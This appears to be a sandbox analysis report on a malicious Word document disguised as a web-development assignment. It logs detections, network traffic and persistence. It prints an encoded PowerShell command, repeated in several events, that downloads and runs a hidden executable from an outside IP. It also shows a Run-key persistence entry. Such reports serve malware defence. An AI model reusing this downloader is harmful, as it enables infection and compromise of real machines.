      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\p4yx0rl0s3\run.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\p4yx0rl0s3\run.exe, ProcessId: 7724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\p4yx0rl0s3
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7268, TargetFilename: C:\Users\user\p4yx0rl0s3\run.exe
      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.
      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 1620, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\p4yx0rl0s3\run.exeReversingLabs: Detection: 65%
      Source: em_webdev_assignment_dec2024.docReversingLabs: Detection: 50%
      Source: em_webdev_assignment_dec2024.docJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

      Software Vulnerabilities

      barindex
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 192.168.2.4:49738 -> 91.208.206.195:80
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
      Source: global trafficTCP traffic: 91.208.206.195:80 -> 192.168.2.4:49738
